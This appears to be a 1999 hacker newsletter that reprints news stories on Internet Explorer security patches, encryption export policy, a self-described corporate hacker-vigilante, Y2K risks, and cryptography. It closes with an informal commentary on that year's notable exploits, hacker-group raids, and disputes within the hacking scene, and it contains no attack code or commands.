The controls in question are Kodak Image Edit: Wang Imaging; Kodak Image Annotation: Wang Imaging; Kodak Image Scan: Wang Imaging; Kodak Thumbnail Image: Wang Imaging; Wang Image Admin: Wang Imaging; HHOpen: HTML help files; Registration Wizard: Internet Explorer Product Registration; and IE Active Setup: Internet Explorer Setup.
Microsoft credited Bulgarian bug hunter Georgi Guninski with discovering the so-called ImportExportFavorites bug. Richard Smith of Pharlap Software and Australian bug hunter Shane Hird were recognized for discovering the ActiveX problems.
Privacy Groups Wary Of Encryption Reforms ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Privacy groups and some lawmakers said Tuesday that they are concerned about legislation the Clinton administration has proposed that gives law enforcement potentially wider berth to access secure data to balance the relaxation of encryption-export controls.
Representatives from the Justice, Defense, and Commerce Departments and the White House briefed reporters and the Congressional Internet Caucus Advisory Committee, a bipartisan group of lawmakers, on the need to let law enforcement access encrypted material in criminal investigations. The White House on Sept. 16 relaxed controls on data-scrambling products that are mass marketed to any country except those seven considered to support terrorism after a one-time technical review. The exact wording of the new regulation will be published by Dec. 15. Industry praised the reforms because the about-face in the administration policy would let U.S. companies compete globally in strong encryption products. However, the reform package also includes draft legislation, the Cyberspace Electronic Security Act, that outlines when and how law enforcement may access secure data.
"We have deep concerns with the draft we've seen," said Jerry Berman, executive director of Center for Democracy and Technology, a privacy group here. The standards for court-ordered access to decryption keys and non-disclosure agreements protecting proprietary data gleaned in the course of investigations are ambiguous, he said. "The legislation should be written very clearly what sources and methods law enforcement and national security will use," Berman said.
The White House has sent the cyberspace security legislation to Capitol Hill and it can be introduced any time, he said. This legislation deserves many hearings and will originate in the Senate Judiciary Committee, Berman said.
The encryption reforms will move forward by Dec. 15 whether the controversial legislation has been passed or not, said Commerce Under Secretary William Reinsch, head of the Bureau of Export Administration. Before the administration's lifting of encryption controls, legislation in the House of Representatives, the Security and Freedom Through Encryption, or SAFE Act, which would eliminate controls, was close to passage. "The administration's announcement doesn't let Congress off the hook. We still need legislation that provides permanent, significant guidelines for the FBI to get a key," said Sen. Patrick Leahy (D-Vt.), co-chair of the Internet caucus.
The author of the SAFE Act, Rep. Bob Goodlatte (R-Va.), said the bill, which enjoys broad congressional support, was ready for a full House vote. "Whether it goes depends on the details of the administration's rule," Goodlatte said.
The cyberspace security legislation will protect personal and industry privacy while also recognizing the serious problem of criminals hiding evidence, said Jim Robinson, Justice's assistant attorney general for the criminal division. The legislation gives special protections to those who deposit their decryption key with a third party, he said. "We will not let the public be left on the cutting floor," Robinson said. Peter Swire, the White House chief counsel for privacy called the cyberspace bill a tailored response to law enforcement. "We will get the rule down right," Swire said.
Wild Wild Web ~~~~~~~~~~~~~
Cybercrime units are overworked and understaffed, so many Netizens are taking matters into their own hands.
You're a bank, and you think someone is trying to hack into your computer system. Where do you turn? Law enforcement offers little help - agencies are overworked and understaffed, and you risk public embarrassment if word gets out.
Apparently, there's another option. You might decide to take the law into your own hands. Which means you might call a man known as Lou Cipher. "Lou" says he's spent the last 10 years working for Fortune 500 companies, turning the tables on computer intruders, performing what some have called vigilante justice in cyberspace.
Cipher, a pseudonym, of his own choosing, says he retired from a 15-year career as a computer consultant in 1990. By then, he had already started his life as a hacker for hire.
In the past 10 years, he's says he's been hired over 50 times by big U.S. firms - mostly financial institutions - looking to get hackers off their back. He says fees now start at $100,000 for new clients, "with no promises of success."
He and his "associates" often take on their tasks by "bridging from the virtual world to the physical." That means breaking into the same computers a hacker has hijacked, chasing the trail through cyberspace, obtaining a real-world address and paying a real-life visit.
Cipher says he's even broken into homes and stolen hackers' computers to teach them a lesson. He gives the machines back after recovering any stolen information
"I am engaged in the protection and regaining of stolen assets because of the inability of government to provide adequate protection and prosecution," Cipher says. And that includes, he admits, breaking laws himself. His defense: "It's self-defense.
"You can call the FBI right now and say a person just got off with a database of customers. What is the FBI going to do?"
Giving Feds the fits The increase in technology crime has given fits to law enforcement agencies who find they don't have the necessary skills to keep up with an army of new criminals, emboldened by the anonymity the Net provides. Even when federal agents act, justice can be slow. It took almost six months for the recent nationwide FBI hacker "crackdown" to produce an arrest.
So Cipher, and some say other such corporate vigilantes, take the law into their own hands.
Still, to call breaking into someone else's home an act of corporate self-defense would likely be considered a stretch in court.
"I don't see that argument holding water," said cyberlaw expert Dorsey Morrow. "It would be a dangerous thing for a corporation to do. The potential liability is incredible."
Particularly if vigilantes hit the wrong target. That's the concern of computer consultant Brian Martin, who maintains the popular hacker information site "attrition.org."
"So Lou and his gang roll up on this house and know the intruder dialed from there. They bust in and terrorize an elderly couple. Oops!" Martin said. "How could they have been so wrong? Because the hacker used a laptop from the phone box outside their house. That scenario scares me."
First identified in a column Cipher was first identified in public when information warfare expert Winn Schwartau used his name in a column for Network World in January. Claims of baseball bat-wielding vigilantes stirred skepticism in the underworld, and neither Martin nor Space Rogue, who maintains the Hacker News Network Web site, say they've ever heard of a hacker being visited by any private security agent.
"Considering the size of this community, if he has visited more than 10 people I am sure word would have leaked," Rogue said. But he added "There have been rumors floating around for a few years of corporations with their own internal security taking matters into their own hands."
That has law enforcement agencies anxious enough to discuss the matter publicly. Jim Christy, special agent for the Department of Defense, debated Schwartau on the topic at the Infowarcon conference earlier this month.
"I have no problem with identifying a bad guy and warning them," said Christy, who for 11 years was chief of computer crime for the Air Force Office of Special Investigations. "That's a legitimate self-defense option for a victim. But it crosses the line when you violate the rights of others. ... It crosses the line when you break the law."
Rely on informants He said the key to making law enforcement agencies more effective is for more victims of computer crime to come forward. Without a backlog of cases, agents can't demand additional resources. Companies that hire vigilantes, or who simply brush computer crime under the rug out of fear of embarrassment, only make the situation worse, he said.
But that won't help victims today, Schwartau said, and they need somewhere to turn.
"The legal community says it's blatantly illegal," Schwartau said. Schwartau, who once shared ownership of a Web site venture with Cipher, says the legal community is being closed-minded on the topic. "Is disarming an adversary illegal? ... You're allowed to do repossession, which is stealing your own possessions back."
When MSNBC visited Cipher at his daytime consulting job, where he is a security adviser for a large U.S. brokerage company, Cipher said he painstakingly verfies his targets and admits sometimes he doesn't catch them. Most of the examples he offered involved pre-emptive strikes against hackers "probing" financial networks - the cyber equivalent of "casing" a bank before a robbery.
Such pre-emptive strikes have taken him as far as Eastern Europe, and even India, he said. In one case, he said college-aged hackers in hte Czech Republic were worming their way toward a bank's credit card database. Another incident involved hackers in India trying to fake an electronic funds transfer.
But sometimes, he said, he does his work entirely over the Internet. Last month he says his agents broke into the computer of a man who held a vast database of stolen credit cards. They scrambled the card numbers to render them useless.
Many more of his stories are less dramatic, involving a polite curbside or coffeehouse conversation with a hacker. Often, that's enough, he says.
"They are very surprised when we come to visit, when we bridge to the physical world," he said.
Desperate countdown to ready Cold War remnants for Y2K ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
All but one of the seven Cold War-era "hot lines" have year 2000 glitches, and the United States and Russia are hurrying to correct them, a top Pentagon official said today.
The Clinton administration is giving Moscow Y2K-compliant software and computers "to correct program deficiencies in outage reporting, monitoring, and channel reroute operations," assistant secretary of defense Edward Warner said.
He made the remarks in testimony prepared for the Senate Special Committee on Y2K. The panel is studying pitfalls of the coding glitch that could cause ill-prepared computers--and the operations they control--to fail on January 1 with the changeover from 1999 to 2000.
To avoid possible misunderstandings during the date change, the United States and Russia agreed on September 13 to set up a joint "Center for Y2K Strategic Stability" at Peterson Air Force Base in Colorado Springs, Colorado.
Sharing information In addition to sharing missile launch information, Russian and U.S. officers staffing the post will be able to talk through any other "defense-related problems that emerge" during the calendar rollover, Warner said. He said the Pentagon had begun the process of procuring updated equipment for the six of seven hot lines found to have problems, "and while the schedule is tight, we are confident that the fixes will be installed and tested by December."
"Assured communications between U.S. and Russian leaders is a priority at all times, and of particular concern over the millennium date change," said Warner, who is responsible for strategy and threat reduction.
The United States and Russia each keep roughly 2,500 nuclear-tipped missiles pointed at one another on hair-trigger alert despite the collapse of the old Soviet Union in December 1991, ending the Cold War.
Immediate communication
They began installing the seven direct communications links, popularly known as hot lines, at the height of the Cold War in the 1960s to guarantee immediate communication when needed.
Among these are: direct links between the two presidents; a link between the secretary of state and the foreign minister; and one connecting nuclear risk-reduction center on both sides. A secure communications link also is key to operations of the temporary Center for Y2K Strategic Stability.
Russia put on hold most Y2K-related fixes and other technical cooperation with the United States after U.S.-led NATO forces began a 78-day air war in March in Yugoslavia, a Russian ally.
When talks resumed in August, Russia agreed with U.S. recommendations regarding "Y2K vulnerabilities in current hot line architecture," Warner said.
He said Y2K problems had been identified at a Russian ground station as well as in commercial software used on both sides, "which would prevent full operation of six of the seven direct communications links over the Y2K transition."
Among the contingency plans now being discussed were the possible addition of "backup analog circuits, additional secure phone/facsimile capability, and installation of emergency INMARSAT (mobile satellite communications) devices on both sides," Warner said.
Critical issues
Another "critical" Y2K-related issue is the security of Russia's nuclear stockpiles, Warner told the committee headed by Utah Republican Robert Bennett and Connecticut Democrat Chris Dodd.
"Of special concern are the security systems in nuclear storage sites affecting access control, perimeter monitoring, fire detection and suppression, and warhead inventory and accountability," he said.
Forces of the 12th Main Directorate of the Russian Defense Ministry, responsible for the storage and security of non-deployed Russian nuclear warheads, are to maintain a "special Y2K monitoring and control center" at each of their 50 main nuclear storage sites in December through March 2000, Warner said.
Under its so-called Cooperative Threat Reduction program, the United States has spent millions of dollars since the end of the Cold War aimed at preventing Russian nuclear material from being purchased or stolen by guerrilla groups or third countries.
Computer wizards crack code in worldwide challenge ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Computer wizards from 20 countries joined together to crack a high-powered secret code, winning a prestigious prize from a Canadian software firm seeking to establish a worldwide standard for encrypting data used in Internet transactions.
A team led by Robert Harley, of France's National Institute for Research in Computer Science and Control (INRIA), won the five-thousand-dollar award after a 40-day effort to solve the puzzle, the firm Certicom said Wednesday.
Harley coordinated a mammoth calculating programme that occupied 195 researchers in 20 countries, using 740 computers to run 130,000 billion computations, it said in a press release received here.
The challenge centered on so-called "public key" cryptography.
Under this, two computers that have never previously communicated agree on a joint key that will decipher coded data.
The goal is to ensure that the key cannot be decoded, even if someone taps into the traffic -- thus ensuring that credit-card numbers and other data sent in electronic commerce cannot be intercepted and misused.
Certicom's challenge related to a logarithmic programme, called elliptic curve cryptography (ECC), that it hopes to have established as an Internet standard for encrypted codes.
It contends that ECC, a newcomer to the field, is more secure than more widely-used rival concepts, uses up less computer memory and gobbles up less bandwidth in the communications link.
Specifically, cryptographers were asked to crack a 97-bit key that was encoded in ECC. They took twice as much computing power to achieve the goal as a 512-bit key in a rival encryption made by RSA Data Security, Certicom said.
The result also showed that "strong security" can be achieved only when a much more powerful key -- a minimum of 163 bits in ECC code -- is used, Certicom said.
The code-crackers included reseachers in Australia, Austria, Britain and the United States.
They have agreed to donate 4,000 dollars of the prize money to the Free Software Foundation, an organisation that encourages the creation of free software.
The remaining 1,000 dollars will go to an Australian member of the team, Paul Bourke, who made the breakthrough in the calculation. Bourke used computers at Australia's Swinburne University that are mainly used for studying pulsars.
U.S. finds malicious code changes in Y2K "fixes" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Malicious changes to computer code under the guise of Year 2000 software fixes have begun to surface in some U.S. work undertaken by foreign contractors, the top U.S. cybercop said yesterday.
"We have some indications that this is happening" in a possible foreshadowing of economic and security headaches stemming from Y2K fixes, Michael Vatis of the Federal Bureau of Investigation told Reuters.
Vatis heads the interagency National Infrastructure Protection Center (NIPC), responsible for detecting and deterring cyberattacks on networks that drive U.S. finance, transport, telecommunications, and other vital sectors.
A Central Intelligence Agency officer assigned to the NIPC said recently that India and Israel appeared to be the "most likely sources of malicious remediation" of U.S. software.
"India and Israel appear to be the countries whose governments or industry may most likely use their access to implant malicious code in light of their assessed motive, opportunity, and means," the CIA officer, Terrill Maynard, wrote in the June issue of Infrastructure Protection Digest.
A significant amount of Y2K repair is also being done for U.S. companies by contractors in Ireland, Pakistan, and the Philippines, according to Maynard. But they appear among the "least likely" providers to jeopardize U.S. corporate or government system integrity, although the possibility cannot be ruled out, he wrote.
Thousands of companies in the United States and elsewhere have contracted out system upgrades to cope with the anticipated Y2K glitch, which could scramble computers when 1999 gives way to 2000.
The CIA declined to comment on Maynard's article. Referring to it, Vatis said, "This is our effort to [give] the public information that hopefully can be useful to people."
Vatis, interviewed at FBI headquarters, said that so far "not a great deal" of Y2K-related tampering had turned up.
"But that's largely because, No. 1, we're really dependent on private companies to tell us if they're seeing malicious code being implanted in their systems," he said.
In reporting evidence of possible Y2K-related sabotage of software, Vatis confirmed one of the worst long-term fears of U.S. national security planners.
"A tremendous amount of remediation of software has been done overseas or by foreign companies operating within the United States," Vatis said.
He said it was "quite easy" for an outsider to code in ways of gaining future access or causing something to "detonate" down the road. This could expose a company to future "denial of service attacks," open it to economic espionage, or leave it vulnerable to malicious altering of data, Vatis said.
The Senate Y2K Committee, in its final report last week, described the issue as "unsettling."
"The effort to fix the code may well introduce serious long-term risks to the nation's security and information superiority," said the panel headed by Sens. Robert Bennett (R-Utah) and Chris Dodd (D-Connecticut).
Vatis, in testimony before the Y2K panel in July, warned that contractors could compromise systems by installing "trap doors" for anonymous access.
By implanting malicious code, he said, a contractor could stitch in a "logic bomb" or a time-delayed virus that would later disrupt operations. Another possible threat is the insertion of a program that would compromise passwords or other system security, he said.
The Senate Y2K Committee said the long-term consequences could include increased foreign intelligence collection and espionage activity, reduced information security, a loss of economic advantage, and increased infrastructure vulnerability.
financial firms create Net crime watch ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Treasury Department, major banks, and investment firms today inaugurated an Internet crime watch center that's intended to share confidential information on cyberthreats to the financial industry.
The Financial Services Information Sharing and Analysis Center is intended to detect attacks from hackers and others on computer systems, and to provide rapid and anonymous notification between banks and other institutions when there is a threat.
"New types of crime require new types of solutions," Treasury Secretary Lawrence Summers said.
Citigroup, Bank of America, Merrill Lynch, J.P. Morgan, and mutual fund giants Vanguard and Fidelity are among the program participants. The firms are prohibited from sharing confidential customer information.
A survey by the Computer Security Institute found that 64 percent of the companies it questioned reported security breaches to computer systems in 1998, up from the number of firms reporting breaches in 1997, Summers said.
"As damaging as these attacks have been, the vast majority has been conducted by disgruntled individuals," Summers said. "We face a future, though, where criminals, terrorists, or even nation states may use the same tools in a more organized way for darker purposes."
President Bill Clinton, in an executive order issued in May 1998, directed the Treasury to pursue the project. The center itself is funded by the participating banks and financial institutions and managed by a private contractor.
Other federal agencies are participating in the effort. "This is a step in the right direction," said Arthur Levitt, chairman of the Securities & Exchange Commission. "It's a whole new world in terms of security."
The program will also help banks coordinate information during the Year 2000 computer rollover, according to Federal Reserve Governor Roger Ferguson. "The creation of the center couldn't come at a more opportune time," Ferguson said in a printed statement.
Last month, computer security product maker Network Associates warned that a computer virus that deletes a computer user's files was spreading through computer systems at major financial institutions.
The bug, dubbed the "Thursday" virus, is programmed to delete files on December 13, 1999, Network Associates said. The virus attacks Microsoft Windows Word 97 files. Users won't know they are infected until December 13, the company said.
The problem isn't restricted to the financial industry or the United States. Just today, Electrabel, Belgium's biggest electricity company, said it successfully warded off an attempt by a computer hacker to infiltrate its system.
Police are investigating the incident, which follows successful computer system break-ins in Belgium at Fortis Bank and at Belgacom's Skynet Internet service in August by a hacker who dubbed himself "Redattack."
SEC investigates NetRoadshow security breach ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Yahoo's NetRoadshow unit discovered a security breach that could have let unauthorized Internet users see information about securities offerings, drawing questions from regulators about the cause of the problem.
NetRoadshow is a pioneer in the business of using the Internet to broadcast sessions that companies hold for institutional investors before stock and bond offerings. Only financial institutions and other sophisticated investors with passwords are supposed to have access to the online meetings, known as roadshows.
Until yesterday afternoon, however, anyone could view parts of sessions that the company has broadcast by entering the company's Web site through an Internet address that NetRoadshow's employees use to make technical changes to the site.
The company said the problem was caused by human error. About a dozen people had gotten into the system yesterday before NetRoadshow found out about the problem and blocked access, the company said. A Yahoo official said the company doesn't know how long the system had been open.
"The problem was resolved immediately yesterday when we found out about it," said Yahoo spokeswoman Sherry Manno. "The breach occurred in our system that receives transferred files and is structured for internal use, not the system investors use."
The Securities and Exchange Commission, which lays out rules for companies issuing stock and limits the audience of both traditional face-to-face road shows and online sessions, said it learned about the security breach yesterday and plans to talk to NetRoadshow about the issue.
"We're going to ask questions about what's going on," said SEC deputy corporation finance director Michael McAlevey. "If it was an inadvertent technical problem, it's less of a concern to us than if it was intentional."
SEC rules seek to prevent executives from hyping their business expectations before an offering or discussing the company beyond the information it has included in its prospectus, which is available to the public. The SEC allows road shows--where underwriters and issuers orally describe the company and try to build interest in the stock before pricing the offering--because they involve a limited audience of sophisticated investors.
The SEC gave its blessing to the Internet-transmitted road show in 1997, when the agency's staff sent "no action" letters to NetRoadshow and the MSNBC cable network, a joint venture of Microsoft and General Electric's NBC television network. They had requested approval to broadcast road shows over the Internet or via MSNBC's Private Financial Network.
The SEC said it wouldn't recommend charges for transmitting the sessions over the Internet, though the agency reserved the right to look at the issue again in the future.
In the July 30, 1997, letter to NetRoadshow, the SEC said: "Since regulatory responses to legal issues raised by technological developments may evolve, you should be aware that this no-action position may be reevaluated in the future."
NetRoadshow was acquired in March by Broadcast.com, which then was bought by Yahoo in July.
Bloomberg, the parent of Bloomberg News, competes with NetRoadshow and several other firms in the business of transmitting road show presentations.
Court to revisit encryption ruling ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A U.S. federal appeals court will reexamine a trial court's decision to lift U.S. government restrictions on the export of encryption technology.
The 9th U.S. Circuit Court of Appeals withdrew a May decision by a panel of three of its judges, which had endorsed the trial court ruling. That indicates that a majority of the active 9th Circuit judges have reservations about the opinion or feel the encryption issue is significant enough to be revisited.
In May, the panel of 9th Circuit judges concluded that the federal government could not limit professor Daniel J. Bernstein's efforts to distribute encryption software.
Many companies, such as Network Associates, have been prevented by U.S. law from selling data-scrambling technology overseas.
Earlier this month, it was reported that the Clinton administration is easing restrictions on data-scrambling technology, clearing the way for Network Associates and other companies to sell the hardest-to-crack encryption technology.
Microsoft Patches IE Security.....Again ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Latest fix eliminates ways that site operators can control your PC.
Microsoft claims to have really done it this time. The company promises that it has completely eliminated the security problems that existed with Internet Explorer with the release of an updated patch for the browser software.
An initial patch announcement was made on September 10, but the patch available as of late last week is more far-reaching, Microsoft said in a statement posted Friday on its security Web site.
The security holes in Internet Explorer were discovered earlier this month. The patch eliminates the "ImportExportFavorites" vulnerability, which affected computers connected to the Internet, Microsoft says.
The security hole made it possible for a Web site operator to carry out any functions that visitors to a Web site could do on their own computers, such as deleting or modifying files or reformatting the hard drive. It derived from a feature in IE 5 that lets users export a list of their favorite Web sites to a file, or import a file with a list of favorite Web sites.
The new patch also plugs security holes that resulted from several ActiveX controls, Microsoft says. These existed both in versions 4.01 and 5 of Internet Explorer.
The ActiveX weakness allowed hackers to manipulate programs on a user's computer when they visited a Web page or received e-mail via Microsoft's Outlook program.
Justice Dept. Funds Antihacking Campaign ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Justice Department is trying to save children before they turn into hackers.
With its $300,000 funding of the Cybercitizen Partnership, an awareness campaign coordinated by the Information Technology Association of America, the Justice Department assumes the unusual role of helping to educate budding Web users about how to be responsible, law-abiding surfers.
The Cybercitizen Partnership, announced in March, is a joint Justice-ITAA effort aimed at protecting the country's Internet infrastructure from outlaw hackers and other criminals. Faced with a security breach, law enforcement officials don't know at first if they're confronting a foreign terrorist, a college student or a couple of sixth-graders who are having some fun with Dad's computer. But an ITAA official said that, upon investigation, a surprising number of cases involve child hackers.
The association says that information technology makes up about 6 percent of the global gross domestic product some $1.8 trillion of electronic infrastructure that needs to be protected against disgruntled former employees, corporate spies and juvenile delinquents who like to pull pranks.
Figuring that it's too late to reform terrorists and spies, the ITAA decided to concentrate on the kids. The campaign, which debuts in January, will initially target children 12 and under, aiming to teach them proper online behavior and to instill a healthy disdain for hacking. The association wants to "help weed out some of the less meaningful system violations by curious children so that law enforcement can focus on the true criminals," says ITAA President Harris Miller.
The cash infusion from the Justice Department is in keeping with a long tradition of government-sponsored public education campaigns, from the Interior Department's Smokey the Bear messages against forest fires to the Drug Enforcement Administration's "Just Say No" war on drugs. Miller says the campaign could be expanded to educate kids about other aspects of proper Internet etiquette, such as warning them against sending spam for kids, the modern-day equivalent of prank telephone calls or visiting Web sites with adult content. The main focus of the campaign, however, will be to "send the message that hacking isn't cute, clever or funny." In addition to the funding from Justice, the ITAA also plans to pass the hat among its own membership, a who's-who list of the high-tech industry that includes Microsoft (MSFT) , America Online (AOL) and IBM (IBM) . The association will also seek funds from foundations and possibly from private individuals.
The association has sent out a request to several public relations companies for ideas on how to run the campaign, which might include television and Internet advertising, brochures and even visits to schools. One possibility under consideration: the creation of a mascot, like the famous McGruff crime dog, to pass the message along in a friendly manner.
Quantum confidential ~~~~~~~~~~~~~~~~~~~~
Want to beat the hackers once and for all? As Simon Singh finds out, the enigmatic quantum world is about to make your secrets safe as houses
IT COULD HAPPEN in a few months or a few years. But sooner or later, a mathematician could make a discovery that jeopardises international security, threatens the future of Internet commerce, and imperils the privacy of e-mails. Today's codes and ciphers are good, to be sure. But it is probably only a matter of time before they become useless.
With the coming of the information age, we rely ever more heavily on cryptography to protect us from snoopers, cyber-crooks and Big Brother. Some of today's most secure codes exploit the fact that while it is easy to multiply two prime numbers together, it is almost impossible to start with the answer and work out which two primes were used to create it. But the day a mathematical genius discovers a short cut for finding the hidden prime numbers, these codes will crumble.
What everyone is looking for is a new form of code, one that is truly unbreakable. That's where the quantum world comes in. Exploiting the strange uncertainties of quantum physics can give you a code that nobody--no matter how clever--will ever be able to crack.
That's the theory. The trouble comes when you try putting it into practice. When quantum particles interact with the large-scale world they tend to lose the delicate information they contain. This makes it fiendishly difficult to use them to send information over any sensible distance. Difficult, but not impossible. In the past few years, researchers have succeeded in sending quantum-encrypted messages tens of kilometres down optical fibres. Now the challenge is to find a way to send quantum-encrypted information through the air. This will open the way to fully secure global communications, beamed up to an orbiting satellite and forwarded to any place on Earth. It's a phenomenal technical problem, but this year researchers at the Los Alamos National Laboratory in New Mexico achieved a breakthrough that looks set to transform the way we keep our secrets.
Online Credit Card Security Fears Waning, But Still a Factor ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A new report by Forrester Research, Inc. found that despite growing consumer comfort with online credit purchasing, the fear of using plastic on the Internet is still the largest obstacle to e-commerce.
According to the report, consumer worries about credit card security have been dropping since early 1998. Forrester examined this trend through three surveys: 120,000 households interviewed in early 1998, 95,000 households in early 1999 and 10,000 online households in July 1999.
Consumer Concern Has Fallen
In 1998, just 15 percent of online households felt safe using their credit cards for online purchases. In the most recent study, this number rose to 53 percent. Furthermore, the percentage of consumers who feel that the Internet is not a secure place to use a credit card has plummeted from 71 to 40 percent.
The survey also found that the longer consumers are online, the more comfortable they become with credit card security. However, this fact alone doesn't explain the waning security fears: 71 percent of consumers who were online for 6 to 12 months in January 1999 felt insecure using credit cards via the Internet. By July, this percentage dropped by 53 percent for consumers who were online for the same length of time.
Security Fears Still Choke E-Commerce
While security fears plummet, Forrester's survey found that 83 percent of consumers who have never shopped online still cite concerns over credit card security as the main reason for not buying online.
According to Forrester, these consumers are driven by a fear of technology snafus and untrustworthy e-tailers. The primary worry is that credit card information can be stolen during transmissions from a PC to an e-tailer. Additionally, 79 percent of those surveyed said that they didn't trust online merchants to safeguard this information -- while 53 percent feared giving their card numbers to e-tailers with no brick-and-mortar presence.
Nonetheless, general apprehension or bad experiences aren't entirely to blame. Forrester discovered that just 25 percent of skeptics say that they are generally wary when using a credit card for any type of purchase. A small group -- 4 percent -- points to a prior bad experience as the reason for not buying online.
How Can It Be Fixed?
Forrester asked reluctant consumers to identify what would make them more likely to use their credit cards online. After reviewing their answers, Forrester has come up with four ways that e-tailers can lessen consumers reluctance to shop online:
Seventy-five percent of the skeptics say that knowing they were using a "secure server site" would make them feel more comfortable. In addition, 48 percent would feel better if e-tailers also had some sort of brick-and-mortar presence to make returns easy.
Forty-one percent of those surveyed by Forrester said that they would like to see online merchants adopt a money-back guarantee before they would be willing to use their credit cards online.
Finally, 45 percent of the consumers interviewed said that their fears would be eased if e-tailers displayed positive testimonials from satisfied customers on their Web sites.
India: Code-Smuggling? Absurd ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Indian officials Friday slammed as ridiculous a suggestion by US officials that Indian Y2K (Year 2000) software firms could have been used to smuggle in computer codes aimed at threatening Washington's security.
Michael Vatis, the top cyber cop in the Federal Bureau of Investigation, told Reuters Thursday that malicious code changes under the guise of Y2K modifications had begun to surface in some US work undertaken by foreign contractors.
The claim signaled possible economic and security threats.
Vatis, who heads the National Infrastructure Protection Center (NIPC), gave no details. But Terrill Maynard, a Central Intelligence Agency officer assigned to the NIPC, said in a recent article that India and Israel appeared to be the "most likely sources" of malicious code.
The article appeared in the June issue of Infrastructure Protection Digest.
"I think this is an utterly ridiculous assertion ... without, as far as I can see, any basis whatsoever," said Montek Singh Ahluwalia, chairman of the Indian government's Y2K Action Force.
"I have no idea if this report is factually correct and if indeed a responsible officer has made what appears to be an irresponsible statement," Ahluwalia told Reuters.
He said the Indian government had not received any official communication to suggest wrongdoing by Indian firms or agencies.
The CIA declined to comment on Maynard's article. Referring to it, Vatis said: "This is our effort to put out in the public information that hopefully can be useful to people."
Indian firms have done more than $2 billion worth of coding work to protect old computers whose date-fields denoted years only by the last two digits. Unless rectified, such computers can cause valuable data crashes when the year 2000 dawns.
India and Israel have had differences with the United States on security matters, particularly on nuclear policy.
Dewang Mehta, president of India's National Association of Software and Service Companies (NASSCOM), cited several reasons to dismiss suggestions Indian firms may be a security threat.
He told Reuters that too much was at stake for India's booming software companies, which have used Y2K as a strategy to gain long-term clients. Besides, Indian firms did the bulk of Y2K work at US sites under client supervision, he added.
"We cannot visualize that any moles have been planted. This is absurd. For us, too much is at stake," Mehta said.
He said Indian firms had also carried out "regression testing," which was aimed at ensuring Y2K programming work did not hamper other software in client systems.
Vatis said it was "quite easy" for an outsider to code in ways of gaining future access or causing something to "detonate" down the road.
This could expose a company to future "denial of service attacks," open it to economic espionage, or leave it vulnerable to malicious altering of data, he said.
Vatis said that so far "not a great deal" of Y2K-related tampering had turned up. But a US Senate panel said last week that long-term consequences of using foreign firms for Y2K work could include more espionage and reduced information security.
Mehta said he heard during a recent visit to Israel a rumor about a computer virus designed to wipe out Y2K solutions.
"I am afraid as only three months are left and many American systems are not compliant, this kind of global rumor-mongering is beginning to happen," he said. We all think we should guard ourselves against it. NASSCOM strongly condemns such rumors."
Maynard noted Ireland, Pakistan, and the Philippines among nations whose firms did significant Y2K repair. He said they were "least likely" to harm US systems but did not rule out threat possibilities.
2. S P E C I A L
~~~~~~~~~~~~~~~~~
2. HACKING IN 1999 | THE CURRENT STATE OF HACKING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Major Exploits released in 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In 1999, many things have happened, the allaire <http://www.allaire.com> cold fusion bug has been widely advertised and put to use, many servers were compromised by using it, if you look to allot of the website defacement mirror sites, almost all were done by the cold fusion method. Yet another easy bug has been released in 1999 by eEye <http://www.eEye.com> Digital Security Team, this bug was for the Microsoft <http://www.microsoft.com> IIS server, and again many people have used this method to make a name for themselves. After looking at exploits like this, it makes you wonder what a hacker is these days? Someone who uses a web browser to hack remote systems? Or is a hacker still defined as it was originally. Hacking is mostly about gaining access to a remote system, not showing off that you outsmarted an admin.
Major Incidents that have Affected the 'Scene' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The first major incident the busting of Eric Burns AKA Zyklon. When companies pressed lawsuits against him for thousands of dollars because he broke into their servers.Up to now he is still not allowed to touch a computer I assume.
The second incident was the raiding of members of the well known group gH <http://www.attrition.org/mirror/attrition/gh.html> a.k.a global Hell. An approximate 19 people were raided if not more, not only from gH <http://www.attrition.org/mirror/attrition/gh.html> but from other groups such as Level Seven <http://www.attrition.org/mirror/attrition/l7.html>, team spl0it <http://www.attrition.org/mirror/attrition/sploit.html>, milw0rm <http://www.attrition.org/mirror/attrition/milworm.html> and IL(Iron Lungs) from HcV <http://www.attrition.org/mirror/attrition/hcv.html>/Legion2000 <http://www.attrition.org/mirror/attrition/l2k.html> and forpaxe <http://www.attrition.org/mirror/attrition/forpax.html>.
Kevin Mitnick <http://www.kevinmitnick.com> was screwed around 2+ times, with them changing his court date around continuously and him now having to owe 1 mil.
Read more about it at 2600 <http://www.2600.com>, also support the FREE KEVIN <http://www.freekevin.com> movement.
Just recently, a few incidents have happened as a result of John Veransevich otherwise known as JP from AntiOnline <http://www.antionline.com>. First, Attrition <http://www.attrition.org> makes a good accusation that JP indeed funded a hacker known as 'so1o' to deface the Senate <http://www.senate.gov> Government website for him just to make a breaking news story (Although, I am not accusing him of doing this, because it was never proven). Another thing you notice about the "Anti Network" is the AntiCode <http://www.anticode.com> website, which claims to be "the only place you need" for all of your exploits/network/security tools and utilities. But in reality this site is nothing more than an archive compiled from other known sites and the code ripped by AntiOnline <http://www.antionline.com> it's self. Second MAJOR incident was when JP shut down a popular IRC server. And the third, probably most devastating to the underground community, was when JP caused Packetstorm Security to shut down, all of Ken Williams files were deleted forever, his work ruined. Not to mention many other things. You can read all those other things at :
<http://www.attrition.org/negation/index2.html>
